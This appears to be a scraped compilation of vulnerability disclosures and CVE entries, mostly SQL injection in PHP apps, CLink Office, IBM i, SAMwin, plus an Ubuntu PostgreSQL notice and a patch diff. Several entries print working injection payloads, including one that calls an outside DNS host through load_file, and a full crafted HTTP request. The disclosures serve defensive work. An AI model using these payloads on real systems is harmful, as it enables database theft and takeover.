SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.

@@ -370,11 +370,13 @@ func (db \*Database) SearchAttribute(query url.Values) (results \[\]types.SearchRes

}

  

if v := query.Get("tf\_version"); string(v) != "" {

where \= append(where, fmt.Sprintf("states.tf\_version LIKE '%s'", fmt.Sprintf("%%%s%%", v)))

where \= append(where, "states.tf\_version LIKE ?")

params \= append(params, fmt.Sprintf("%%%s%%", v))

}

  

if v := query.Get("lineage\_value"); string(v) != "" {

where \= append(where, fmt.Sprintf("lineages.value LIKE '%s'", fmt.Sprintf("%%%s%%", v)))

where \= append(where, "lineages.value LIKE ?")

params \= append(params, fmt.Sprintf("%%%s%%", v))

}

  

if len(where) \> 0 {

CVE-2022-1883: fix(db): possible sql injection on /search endpoint · camptocamp/terraboard@2a5dbaa

A stored cross-site scripting (XSS) vulnerability in /scas/?page=clubs/application_form&id=7 of School Club Application System v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.

Submitted by oretnom23 on Thursday, April 7, 2022 - 17:48.

****Introduction****

This simple project is a **School Clubs Application System**. This is a web-based application project developed in **PHP** and **MySQL Database**. this application provides an online platform for exploring the different clubs in certain schools and submitting a membership application. This project has a simple and pleasant user interface using **Material Kit 2 Template** and **Bootstrap 5 Framework**. It consists of user-friendly features and functionalities.

****About the School Clubs Application System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Google Material Icon**
*   **Material Kit 2 Template**

This **School Clubs Application System** is accessible to the **School Management, Club's Admin/Staff, and Students**. The **Management Site** is the side of the system where the school management has the privilege to access and manage the list of the school's student clubs. This site requires the **Admin Type** user credentials in order to gain access to the features and functionalities of this site. The **admin users** are the only ones who can register the **Club's Admin/Staff Users**. The **Club's Admin/Staff site** is the side of the application where the admin or staff of a certain club can manage the membership applications to their club submitted on the system. They can also update the application status. They can also view the basic information of the applicant including their contact information where they can reach back to the application according to their application. The students can access only the public site of the application where they are allowed to explore the active clubs of the school and read the information about each club.

****Features********Admin-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Club Management**
    *   Add New Club
    *   List All Clubs
    *   View Club Details
    *   Edit Club Details
    *   Delete Club Details
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Club's Admin/Staff-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Public-Side****

*   **Home Page**
    *   Display the Welcome Content.
*   **'About Us' Content**
*   **List All Active Clubs**
*   **View Club's Details**
*   **Club's Application Form**
*   **Submit Application**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Public-Side's Club List****

****Admin-Side Home Page****

****Club Details (Admin-Side)****

****User Details (Admin-Side)****

****Club's Admin/Staff-Side Home Page****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project assets at https://www.dropbox.com/s/tocky9atdwtk1gs/scas\_assets.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded assets **zip** file**.
6.  **Copy** the extracted assets folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****scas\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****scas\_db.sql**** located inside the **database** folder.
10.  **Browse** the **School Clubs Application System** in a **browser**. i.e. ****http://localhost/scas/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **School Clubs Application System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1578 views

CVE-2022-29359: School Club Application System in PHP/OOP Free Source Code

Ubuntu Security Notice 5440-1 - Alexander Lakhin discovered that PostgreSQL incorrectly handled the security restricted operation sandbox when a privileged user is maintaining another user's objects. An attacker having permission to create non-temp objects can use this issue to execute arbitrary commands as the superuser.

==========================================================================  
Ubuntu Security Notice USN-5440-1  
May 24, 2022

postgresql-10, postgresql-12, postgresql-13, postgresql-14 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

PostgreSQL could be made to execute commands as the superuser.

Software Description:  
- postgresql-14: Object-relational SQL database  
- postgresql-13: Object-relational SQL database  
- postgresql-12: Object-relational SQL database  
- postgresql-10: Object-relational SQL database

Details:

Alexander Lakhin discovered that PostgreSQL incorrectly handled the  
security restricted operation sandbox when a privileged user is maintaining  
another user's objects. An attacker having permission to create non-temp  
objects can use this issue to execute arbitrary commands as the superuser.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  postgresql-14                   14.3-0ubuntu0.22.04.1

Ubuntu 21.10:  
  postgresql-13                   13.7-0ubuntu0.21.10.1

Ubuntu 20.04 LTS:  
  postgresql-12                   12.11-0ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  postgresql-10                   10.21-0ubuntu0.18.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5440-1  
  CVE-2022-1552

Package Information:  
  https://launchpad.net/ubuntu/+source/postgresql-14/14.3-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-13/13.7-0ubuntu0.21.10.1  
  https://launchpad.net/ubuntu/+source/postgresql-12/12.11-0ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-10/10.21-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5440-1

Online Fire Reporting System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Online Fire Reporting System 1.0 SQLi## Author: nu11secur1ty## Date: 05.24.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting## Description:The `date` parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'was submitted in the `date` parameter.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: date (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''OR NOT 3052=3052 AND 'yrRg'='yrRg    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT(ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: page=reports&date=2022-05-24'+(selectload_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting)## Proof and Exploit:[href](https://streamable.com/znojdy)

Online Fire Reporting System 1.0 SQL Injection

CLink Office version 2.0 anti-spam management console suffers from a remote SQL injection vulnerability.

    # Exploit Title: Multiple blind SQL injection vulnerabilities in in CLink Office 2.0 Anti-Spam management console # Date: 30 Mar 2022 # Exploit Author: Erwin Chan, Stephen Tsoi # Vendor Homepage: https://www.communilink.net/ # Softwar: CLink Office # Version: 2.0 # Tested on: CLink Office 2.0 Anti-Spam management consoleVulnerability details below:Affected URL: /cgi-bin/anti-spam.plAffected Parameter: username, passwordPayload example:- boolean-based blind SQLi* ' AND 1234=(SELECT (CASE WHEN (TRUE) THEN 1234 ELSE (SELECT 1111 UNIONSELECT 2222) END))-- LMgx**' AND 1234=(SELECT (CASE WHEN (FALSE) THEN 1234 ELSE (SELECT 1111 UNIONSELECT 2222) END))-- LMgx*- time-based blind SQLi*' OR SLEEP(5)-- LMgx*As a result, we were able to dump database data on application. I recommenddevelopment team to perform input sanitization on affected parameters.Please lets me know if you have any questions. Thanks.

CLink Office 2.0 SQL Injection

IBM i 7.3, 7.4, and 7.5 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 226941.

CVE-2022-22495: IBM i SQL injection CVE-2022-22495 Vulnerability Report

A vulnerability has been found in Airfield Online and classified as problematic. This vulnerability affects the path /backups/ of the MySQL backup handler. An attacker is able to get access to sensitive data without proper authentication. It is recommended to the change the configuration settings.

CVE-2021-4230

A vulnerability classified as critical has been found in Telecommunication Software SAMwin Contact Center Suite 5.1. This affects the function getCurrentDBVersion in the library SAMwinLIBVB.dll of the database handler. The manipulation leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 6.2 is able to address this issue. It is recommended to upgrade the affected component.

CVE-2013-10003

A vulnerability was found in Telecommunication Software SAMwin Contact Center Suite 5.1. It has been rated as critical. Affected by this issue is the function getCurrentDBVersion in the library SAMwinLIBVB.dll of the credential handler. Authentication is possible with hard-coded credentials. Upgrading to version 6.2 is able to address this issue. It is recommended to upgrade the affected component.

\-----------------------------------------------------------------v1.1- modzero Security Advisory: SAMwin Contact Center Suite - Architectural issues lead to database compromise \[MZ-13-06\] --------------------------------------------------------------------- --------------------------------------------------------------------- 1. Timeline --------------------------------------------------------------------- \* 2014-03-13: Advisory will be published. \* 2013-09-24: Vendor responded. \* 2013-09-20: Vendor has been contacted. --------------------------------------------------------------------- 2. Summary --------------------------------------------------------------------- Vendor: Telecommunication Software GmbH Products known to be affected: SAMwin Contact Center Suite 5.1, the SAMwin Agent login mask shows version 5.01.19.06 Severity: High Remote exploitable: Yes The SAMwin Call Center Suite is a SIP-based call center solution, which assists users with various features like call forwarding, skill based routing, a realtime wallboard, reporting and supervisor monitoring. The environment consists of at least one SAMwin Contact Center Suite Server (SAMwin Server) component, a SQL database server and the SAMwin Contact Center Suite Agent (SAMwin Agent). The SAMwin Agent is installed on the call center employee's desktop computer and provides a configured set of features, based on a role and permission concept configured by the supervisor or an administrator. The SAMwin Server's core function is SIP-based call handling and routing. The database server acts as datastore and is directly accessed by the SAMwin Server and Agent. The architecture does not use any middleware, which could verify or sanitize communication between the SAMwin Agents and the database. The SAMwinAgent is designed to use hard coded database authentication credentials to connect to the SAMwin database server during startup, prior to any other user authentication. The password is defined and hard coded by the vendor. Therefore, all installations on any customer-site use the same database credentials. No input sanitizing is conducted and no prepared statements are used and, thus, arbitrary SQL command execution is possible via the username field of the login mask. However, an attacker might simply connect directly to the database using the credentials he extracted from the SAMwin binaries. As all the information regarding user-accounts, call routing and interconnection details of the infrastructure is stored in the database, an attacker can gain full control over the SAMwin software that handles calls. Depending on the database configuration hardening, an attacker might be able to gain access to the database server's operating system as well, to read, write and execute arbitrary files on the filesystem. --------------------------------------------------------------------- 3. Details --------------------------------------------------------------------- The SAMwin Agent is designed to use hard coded database authentication credentials to connect to the SQL database server during startup, prior to any other authentication. To logon to the SAMwin Agent application, the user enters his access credentials into the corresponding fields in the login mask. When a user enters his SAMwin account information into the login screen, SQL queries are sent directly to the database server using hard coded credentials verifying the given username and password against credentials stored in the database. The database credentials can be extracted from the SAMwin Agent by analyzing the SAMwinLIBVB.dll shared library that is usually located under C:\\Program Files\\contact center suite 5.1\\Bin\\. The file is available to everyone with access to the SAMwin Agent software. The database connection is initiated a method called getCurrentDBVersion(), which calls generateTransactSql() to obtain the password for the database connection: new SqlConnection( "Data Source=%%SERVER%%; Initial\\ Catalog=%%DATABASE%%; UId=%%USER%%; Pwd=%%PWD%%;Pooling=False"\\ .Replace("%%USER%%", "SAMwin").Replace("%%PWD%%",\\ Database.generateTransactSql()).Replace("%%SERVER%%", host)\\ .Replace("%%DATABASE%%", dbName) ); The function generateTransactSql() de-obfuscates the hard coded database password and returns its cleartext representation. The username SAMwin and the de-obfuscated 36 characters long password can be used by an attacker to connect to the SQL database with any SQL client to get access to its data. Due to the absence of any middleware sanitizing and verifying input data send by the SAMwin Agent, arbitrary SQL commands can be executed from the username field of the SAMwin Agent login mask. When a SAMwin Agent user logs in, the username and password will be compared against values that are stored in the database. By terminating the username with a single quote character, any person with access to the SAMwin Agent login form can execute malicious SQL statements. For example, the following string can be used as username to verify the SQL command execution on the SQL server. USERNAME' AND 1=1; WAITFOR DELAY '0:0:3'-- The example above can be used for a blind SQL injection, as the database will delay execution for 3 seconds; the timing in this case is a side-channel to proof the problem of blind injections into SQL statements. As the credentials required for a direct database access are available to anyone with access to the SAMwin Agent, the SQL injection is not required to be abused by an attacker as he simply could connect the database directly using any arbitrary SQL client. Direct access to the database is required based on the given architecture. Otherwise, the legit SAMWin Agent could not operate. It is recommended to use a middleware application between client and backend systems for being able to perform authentication and input validation, before data is passed to a database. No client software should be allowed to connect to any database system directly using hard coded credentials. --------------------------------------------------------------------- 4. Impact --------------------------------------------------------------------- Because credentials are hard coded and equal for all installations, an attacker reveals them once and is able to exploit multiple installations. Conceptually, these database credential results in read and write access to the database. Thus, an attacker knowing these credentials and with direct access to the database is able to modify the database content. An SQL injection vulnerability within the application leads to a full compromise, too, as all the SQL statements will be executed using the same database account with read and write permissions. As the content of the database holds all the information regarding the users, the call routing and interconnection details of the surrounding infrastructure, a successful attacker gains full control over the call center, its calls and probably data of other systems. --------------------------------------------------------------------- 5. Workaround --------------------------------------------------------------------- No known workaround to fix the architecture design is available yet. Network access to the SAMwin database server should be restricted to prevent access from untrustworthy networks and clients. --------------------------------------------------------------------- 6. Fix --------------------------------------------------------------------- According to the vendor, users of this software should upgrade to version 6.2, which should be available in Q4 2013. The vendor will not provide any fixes for previous versions. --------------------------------------------------------------------- 7. Credits --------------------------------------------------------------------- \* Tobias Ospelt (tobias@modzero.ch) \* Max Moser (mmo@modzero.ch) --------------------------------------------------------------------- 8. About modzero --------------------------------------------------------------------- The independent Swiss company modzero AG assists clients with security analysis in the complex areas of computer technology. The focus lies on highly detailed technical analysis of concepts, software and hardware components as well as the development of individual solutions. Colleagues at modzero AG work exclusively in practical, highly technical computer-security areas and can draw on decades of experience in various platforms, system concepts, and designs. http://modzero.ch contact@modzero.ch --------------------------------------------------------------------- 9. Disclaimer --------------------------------------------------------------------- The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

CVE-2013-10002

Covid-19 Travel Pass Management System v1.0 is vulnerable to SQL Injection via /ctpms/classes/Master.php?f=update_application_status

Permalink

Cannot retrieve contributors at this time

**covid-19-travel-pass-management-system v1.0 has SQL injection**

vendors: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ctpms/classes/Master.php?f=update\_application\_status

Vulnerability location:/ctpms/classes/Master.php?f=update\_application\_status, id

\[+\] Payload: 1'and/\*\*/extractvalue(1,concat(char(126),database()))and' // Leak place ---> id

Tested on Windows 10, XAMPP

    POST /ctpms/classes/Master.php?f=update_application_status HTTP/1.1
    Host: 192.168.2.106
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------4024160998608039623756913069
    Content-Length: 335
    Origin: http://192.168.2.106
    Connection: keep-alive
    Referer: http://192.168.2.106/ctpms/admin/?page=applications/view_application&id=1
    Cookie: PHPSESSID=0389fublnj7ggho8q04fuvfaqe
    
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="id"
    
    1'and/**/extractvalue(1,concat(char(126),database()))and'
    -----------------------------4024160998608039623756913069
    Content-Disposition: form-data; name="status"
    
    1
    -----------------------------4024160998608039623756913069--

Tag

#sql